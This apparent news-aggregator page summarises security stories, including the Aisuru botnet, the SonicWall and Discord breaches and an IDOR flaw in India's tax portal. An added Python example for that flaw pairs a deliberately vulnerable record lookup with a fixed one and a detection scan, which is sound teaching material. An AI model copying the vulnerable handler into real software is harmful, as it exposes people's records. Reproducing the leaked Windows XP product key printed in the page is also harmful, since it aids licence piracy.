Since its debut more than a year ago, the Aisuru botnet has steadily outcompeted virtually all other IoT-based botnets in the wild, with recent attacks siphoning Internet bandwidth from an estimated 300,000 compromised hosts worldwide. The hacked systems that get subsumed into the botnet are mostly consumer-grade routers, security cameras, digital video recorders and other devices operating with insecure and outdated firmware, and/or factory-default settings. Aisuru's owners are continuously scanning the Internet for these vulnerable devices and enslaving them for use in distributed denial-of-service (DDoS) attacks that can overwhelm targeted servers with crippling amounts of junk traffic.

As Aisuru's size has mushroomed, so has its punch. In May 2025, KrebsOnSecurity was hit with a near-record 6.35 terabits per second (Tbps) attack from Aisuru, which was then the largest assault that Google's DDoS protection service Project Shield had ever mitigated. Days later, Aisuru shattered that record with a data blast in excess of 11 Tbps. By late September, Aisuru was publicly flexing DDoS capabilities topping 22 Tbps. Then on October 6, its operators heaved a whopping 29.6 terabits of junk data packets each second at a targeted host. Hardly anyone noticed because it appears to have been a brief test or demonstration of Aisuru's capabilities: The traffic flood lasted only a few seconds and was pointed at an Internet server that was specifically designed to measure large-scale DDoS attacks.

Aisuru's overlords aren't just showing off. Their botnet is being blamed for a series of increasingly massive and disruptive attacks. Although recent assaults from Aisuru have targeted mostly ISPs that serve online gaming communities like Minecraft, those digital sieges often result in widespread collateral Internet disruption. For the past several weeks, ISPs hosting some of the Internet's top gaming destinations have been hit with a relentless volley of gargantuan attacks that experts say are well beyond the DDoS mitigation capabilities of most organizations connected to the Internet today.

Security

SonicWall Breach Exposes All Cloud Backup Customers' Firewall Configs (csoonline.com) 14

An anonymous reader quotes a report from CSO Online: On Sept. 17, security vendor SonicWall announced that cybercriminals had stolen backup files configured for cloud backup. At the time, the company claimed the incident was limited to "less than five percent" of its customers. Now, the firewall provider has admitted that "all customers" using the MySonicWall cloud backup feature were affected. According to the company, the stolen files contain encrypted credentials and configuration data. "[W]hile encryption remains in place, possession of these files could increase the risk of targeted attacks," SonicWall warns in its press release.

Security specialist Arctic Wolf also warns of the consequences of the incident. "Firewall configuration files store sensitive information that can be leveraged by threat actors to exploit and gain access to an organization's network," explains Stefan Hostetler, threat intelligence researcher at Arctic Wolf. "These files can provide threat actors with critical information such as user, group, and domain settings, DNS and log settings, and certificates," he adds. Arctic Wolf has previously observed threat actors, including nation-state and ransomware groups, exfiltrating firewall configuration files to use for future attacks.
SonicWall urges all customers and partners to regularly check their devices for updates. Admins can find additional information here.
IT

The People Rescuing Forgotten Knowledge Trapped On Old Floppy Disks (bbc.com) 57

smooth wombat writes: At one point in technology history, floppy disks reigned supreme. Files, pictures, games, everything was put on a floppy disk. But technology doesn't stand still and as time went on disks were replaced by CDs, DVDs, thumb drives, and now cloud storage. Despite these changes, floppy disks are still found in long forgotten corners of businesses or stuffed in boxes in the attic. What is on these disks is anyone's guess, but Cambridge University Library is racing against time to preserve the data. However, lack of hardware and software to read the disks, if they're readable at all, poses unique challenges.

Some of the world's most treasured documents can be found deep in the archives of Cambridge University Library. There are letters from Sir Isaac Newton, notebooks belonging to Charles Darwin, rare Islamic texts and the Nash Papyrus -- fragments of a sheet from 200BC containing the Ten Commandments written in Hebrew.

These rare, and often unique, manuscripts are safely stored in climate-controlled environments while staff tenderly care for them to prevent the delicate pages from crumbling and ink from flaking away.

But when the library received 113 boxes of papers and mementoes from the office of physicist Stephen Hawking, it found itself with an unusual challenge. Tucked alongside the letters, photographs and thousands of pages relating to Hawking's work on theoretical physics, were items now not commonly seen in modern offices -- floppy disks.

They were the result of Hawking's early adoption of the personal computer, which he was able to use despite having a form of motor neurone disease known as amyotrophic lateral sclerosis, thanks to modifications and software. Locked inside these disks could be all kinds of forgotten information or previously unknown insights into the scientist's life. The archivists' minds boggled.

These disks are now part of a project at Cambridge University Library to rescue hidden knowledge trapped on floppy disks. The Future Nostalgia project reflects a larger trend in the information flooding into archives and libraries around the world.

Chrome

Chrome Will Automatically Disable Web Notifications You Don't Care About (theverge.com) 13

Google is introducing a new Chrome browser feature for Android and desktop users that automatically turns off notifications for websites that you're already ignoring. From a report: Chrome's Safety Check feature already provides similar functionality for camera access and location tracking permissions.

This new auto-revocation feature builds on a similar Android feature that already makes it easier for Chrome users to unsubscribe from website notifications they don't care about with a single tap. The feature doesn't revoke notifications for any web apps installed on the device, and permissions will only be disabled for sites that send a lot of notifications that users rarely engage with. Less than one percent of all web notifications in Chrome currently receive any interaction from users, according to Google, often making them more distracting than helpful.

Security

Apple Doubles Its Biggest Bug Bounty Reward To $2 Million (engadget.com) 13

Apple is updating its Security Bounty program this November to offer some of the highest rewards in the industry. From a report: It has doubled its top award from $1 million to $2 million for the discovery of "exploit chains that can achieve similar goals as sophisticated mercenary spyware attacks" and which require no user interaction. But the maximum possible payout can exceed $5 million for the discovery of more critical vulnerabilities, such as bugs in beta software and Lockdown Mode bypasses. Lockdown Mode is an upgraded security architecture in the Safari browser.

In addition, the company is rewarding the discovery of exploit chains with one-click user interaction with up to $1 million instead of just $250,000. The reward for attacks requiring physical proximity to devices can now also go up to $1 million, up from $250,000, while the maximum reward for attacks requiring physical access to locked devices has been doubled to $500,000. Finally, researchers "who demonstrate chaining WebContent code execution with a sandbox escape can receive up to $300,000."

IT

Poland Says Cyberattacks on Critical Infrastructure Rising, Blames Russia (reuters.com) 26

An anonymous reader shares a report: Poland's critical infrastructure has been subject to a growing number of cyberattacks by Russia, whose military intelligence has trebled its resources for such action against Poland this year, the country's digital affairs minister told Reuters. Of the 170,000 cyber incidents that have been identified in the first three quarters of this year, a significant portion has been attributed to Russian actors, while other cases are financially motivated, involving theft or other forms of cybercrime, Krzysztof Gawkowski said.

He said Poland is subject to between 2,000 and 4,000 incidents a day and that 700 to 1,000 are "taken up by us, meaning they posed a real threat or had the potential to cause serious problems," he said. Foreign adversaries are now expanding their focus beyond water and sewage systems to the energy sector, he said.

Windows

Windows Product Activation Creator Reveals Truth Behind XP's Most Notorious Product Key (tomshardware.com) 34

Dave W. Plummer, the Microsoft developer who created Task Manager and helped build Windows Product Activation, has revealed the origins of Windows XP's most notorious product key. The alphanumeric string FCKGW-RHQQ2-YXRKT-8TG6W-2B7Q8 was not cracked through clever hacking but leaked as a legitimate volume licensing key five weeks before XP's October 2001 release.

A warez group distributed the key alongside special corporate installation media. Windows Product Activation generated hardware IDs from system components and sent them to Microsoft for validation. The leaked volume licensing key bypassed this entirely. The system recognized it as corporate licensing and skipped phone-home activation. Users could install XP without activation prompts or 30-day timers. Microsoft later blacklisted the key.
EU

One-Man Spam Campaign Ravages EU 'Chat Control' Bill (politico.eu) 54

An anonymous reader shares a report: A website set up by an unknown Dane over the course of one weekend in August is giving a massive headache to those trying to pass a European bill aimed at stopping child sexual abuse material from spreading online.

The website, called Fight Chat Control, was set up by Joachim, a 30-year-old software engineer living in Aalborg, Denmark. He made it after learning of a new attempt to approve a European Union proposal to fight child sexual abuse material (CSAM) -- a bill seen by privacy activists as breaking encryption and leading to mass surveillance.

The site lets visitors compile a mass email warning about the bill and send it to national government officials, members of the European Parliament and others with ease. Since launching, it has broken the inboxes of MEPs and caused a stir in Brussels' corridors of power. "We are getting hundreds per day about it," said Evin Incir, a Swedish Socialists and Democrats MEP, of the email deluge.

Privacy

Discord Says 70,000 Users May Have Had Their Government IDs Leaked In Breach (theverge.com) 48

An anonymous reader quotes a report from The Verge: Discord has identified approximately 70,000 users that may have had their government ID photos exposed as part of a customer service data breach announced last week, spokesperson Nu Wexler tells The Verge. A tweet by vx-underground said that the company was being extorted over a breach of its Zendesk instance by a group claiming to have "1.5TB of age verification related photos. 2,185,151 photos." In its announcement last week, Discord said that information like names, usernames, emails, the last four digits of credit cards, and IP addresses also may have been impacted by the breach. "All affected users globally have been contacted and we continue to work closely with law enforcement, data protection authorities, and external security experts," said Wexler. "We've secured the affected systems and ended work with the compromised vendor. We take our responsibility to protect your personal data seriously and understand the concern this may cause."
Crime

Teens Arrested In London Preschool Ransomware Attack (theregister.com) 16

An anonymous reader quotes a report from The Register: London cops on Tuesday arrested two teenagers on suspicion of computer misuse and blackmail following a ransomware attack on a chain of London preschools. London's Metropolitan Police said the two men, both aged 17, were taken into custody during an operation at residential properties in Bishop's Stortford, Hertfordshire. The arrests followed a September 25 referral from the UK's Action Fraud reporting center detailing a ransomware attack on the preschools. While the Met police didn't name the schools, the timing of the referral coincides with a digital break-in at Kido International, a preschool and daycare organization that operates in the UK, US, and India.

In a very aggressive -- and disgusting -- attempt to extort a ransom payment from Kido, the criminals published profiles of 10 children, including photos, names, and home addresses, along with their parents' contact details and in some cases places of work, threatening to expose more if the ransom demand wasn't met. A new crime crew calling itself the Radiant Group claimed responsibility for the attack, and posted the preschool's name, along with its pupils' profiles, as the first leak on its dark web site. The ransomware gang later deleted the kids' and parents' data, apparently under pressure from other criminals -- but not before some of the parents reported receiving threatening calls.

Privacy

Salesforce Says It Won't Pay Extortion Demand in 1 Billion Records Breach (arstechnica.com) 28

Salesforce says it's refusing to pay an extortion demand made by a crime syndicate that claims to have stolen roughly 1 billion records from dozens of Salesforce customers. From a report: The threat group making the demands began their campaign in May, when they made voice calls to organizations storing data on the Salesforce platform, Google-owned Mandiant said in June. The English-speaking callers would provide a pretense that necessitated the target connect an attacker-controlled app to their Salesforce portal. Amazingly -- but not surprisingly -- many of the people who received the calls complied.

[...] Earlier this month, the group created a website that named Toyota, FedEx, and 37 other Salesforce customers whose data was stolen in the campaign. In all, the number of records recovered, Scattered LAPSUS$ Hunters claimed, was "989.45m/~1B+." The site called on Salesforce to begin negotiations for a ransom amount "or all your customers [sic] data will be leaked." The site went on to say: "Nobody else will have to pay us, if you pay, Salesforce, Inc." The site said the deadline for payment was Friday.

IT

Logitech Will Brick Its $100 Pop Smart Home Buttons on October 15 (arstechnica.com) 92

An anonymous reader shares a report: In another loss for early smart home adopters, Logitech has announced that it will brick all Pop switches on October 15.

In August of 2016, Logitech launched Pop switches, which provide quick access to a range of smart home actions, including third-party gadgets. For example, people could set their Pop buttons to launch Philips Hue or Insteon lighting presets, play a playlist from their Sonos speaker, or control Lutron smart blinds. Each button could store three actions, worked by identifying smart home devices on a shared Wi-Fi network, and was controllable via a dedicated Android or iOS app. The Pop Home Switch Starter Pack launched at $100, and individual Pop Add-on Home Switches debuted at $40 each.

A company spokesperson told Ars Technica that Logitech informed customers on September 29 that their Pop switches would soon become e-waste.

Data Storage

Synology Reverses Course on Some Drive Restrictions (arstechnica.com) 29

Synology has released an update to its Disk Station Manager software that removes verified drive requirements from its 2025 model-year Plus, Value and J-series DiskStation network-attached storage devices. The change allows users to install non-validated third-party drives and create storage pools without restrictions.

The company had expanded its verified drive policy to the entire Plus line a few months earlier. Synology-branded drives carried substantial price premiums over commodity hardware. The HAT5310 enterprise SATA drive costs $299 for 8TB compared to $220 for an identically sized Seagate Exos disk. Users who installed non-verified drives in affected models faced reduced functionality and persistent warning messages in the DSM interface.

Synology said today it is collaborating with third-party drive manufacturers to accelerate testing and verification of additional storage drives. Pool and cache creation on M.2 disks still requires drives from the hardware compatibility list. Synology did not clarify whether the policy change applies to previous-generation products.
Bug

Security Bug In India's Income Tax Portal Exposed Taxpayers' Sensitive Data (techcrunch.com) 9

A now-fixed security flaw in India's income tax e-filing portal exposed millions of taxpayers' personal and financial data due to a basic IDOR vulnerability that let users view others' records by swapping PAN numbers. "The exposed data included full names, home addresses, email addresses, dates of birth, phone numbers, and bank account details of people who pay taxes on their income in India," reports TechCrunch. "The data also exposed citizens' Aadhaar number, a unique government-issued identifier used as proof of identity and for accessing government services." From the report: The researchers found that when they signed into the portal using their Permanent Account Number (PAN), an official document issued by the Indian income tax department, they could view anyone else's sensitive financial data by swapping out their PAN for another PAN in the network request as the web page loads. This could be done using publicly available tools like Postman or Burp Suite (or using the web browser's in-built developer tools) and with knowledge of someone else's PAN, the researchers told TechCrunch.

The bug was exploitable by anyone who was logged in to the tax portal because the Indian income tax department's back-end servers were not properly checking who was allowed to access a person's sensitive data. This class of vulnerability is known as an insecure direct object reference, or IDOR, a common and simple flaw that governments have warned is easy to exploit and can result in large-scale data breaches.
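The two paragraphs above describe the defect in one sentence: the server checked that the caller was logged in but never checked that the PAN in the request belonged to that caller. The following is an added illustration, not the e-filing portal's code, showing a record lookup with only that login check beside one that also binds the requested key to the session identity, plus a log scan a defender could run to surface cross-account reads. The PANs, record contents, and access-log format are constructed for this example.

```python
"""Added illustration of the IDOR class described above: authentication
without authorization, its fix, and a detection pass over access logs.
All names, PANs and the log format are constructed for this example."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample store keyed by PAN; the PANs are fake placeholders.
RECORDS: Dict[str, Dict[str, str]] = {
    "AAAAA1111A": {"name": "Taxpayer One", "bank_account": "XXXXXX1111"},
    "BBBBB2222B": {"name": "Taxpayer Two", "bank_account": "XXXXXX2222"},
}


@dataclass
class Session:
    """Identity established at login; the only PAN the caller may read."""
    pan: str


class Forbidden(Exception):
    pass


def get_record_vulnerable(session: Optional[Session], requested_pan: str) -> Optional[Dict[str, str]]:
    """Authentication only: any logged-in caller can read any PAN's record.
    This is the shape of the flaw in the report, kept here for contrast."""
    if session is None:
        raise Forbidden("login required")
    return RECORDS.get(requested_pan)


def get_record_fixed(session: Optional[Session], requested_pan: str) -> Optional[Dict[str, str]]:
    """Authentication plus authorization: the object key in the request
    must match the identity the server bound to the session at login."""
    if session is None:
        raise Forbidden("login required")
    if requested_pan != session.pan:
        # Deny before the lookup so the caller learns nothing about other PANs.
        raise Forbidden("record does not belong to this session")
    return RECORDS.get(requested_pan)


def is_denied(session: Optional[Session], requested_pan: str) -> bool:
    """True when the fixed handler refuses the read."""
    try:
        get_record_fixed(session, requested_pan)
    except Forbidden:
        return True
    return False


# Constructed access-log lines in an assumed format, one request per line.
LOG_LINES: List[str] = [
    "2025-09-01T10:00:01Z session_pan=AAAAA1111A requested_pan=AAAAA1111A status=200",
    "2025-09-01T10:00:05Z session_pan=AAAAA1111A requested_pan=BBBBB2222B status=200",
    "2025-09-01T10:00:09Z session_pan=BBBBB2222B requested_pan=BBBBB2222B status=200",
]

_LOG_RE = re.compile(r"session_pan=(\w+) requested_pan=(\w+) status=(\d+)")


def find_cross_account_reads(lines: List[str]) -> List[Dict[str, str]]:
    """Detection view: successful reads where the requested PAN differs from
    the session's PAN. On a correctly authorized backend this list is always
    empty, so any hit is either a missing check or abuse worth triaging."""
    hits: List[Dict[str, str]] = []
    for line in lines:
        m = _LOG_RE.search(line)
        if not m:
            continue
        session_pan, requested_pan, status = m.groups()
        if status == "200" and session_pan != requested_pan:
            hits.append({"session_pan": session_pan, "requested_pan": requested_pan, "line": line})
    return hits


if __name__ == "__main__":
    me = Session("AAAAA1111A")
    print("vulnerable handler leaks:", get_record_vulnerable(me, "BBBBB2222B"))
    print("fixed handler, own record:", get_record_fixed(me, "AAAAA1111A"))
    print("fixed handler denies other record:", is_denied(me, "BBBBB2222B"))
    print("cross-account reads in log:", len(find_cross_account_reads(LOG_LINES)))
```

The design point is that the identity used for the ownership check comes from server-side session state, never from the request body or URL; logging both values on every read gives a simple invariant (session identity equals requested object owner) that can be alerted on regardless of which handler was deployed.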

"This is an extremely low-hanging thing, but one that has a very severe consequence," the researchers told TechCrunch. In addition to the data of individuals, the researchers said that the bug also exposed data associated with companies who were registered with the e-Filing portal. [...] It remains unclear how long the vulnerability has existed or whether any malicious actors have accessed the exposed data.
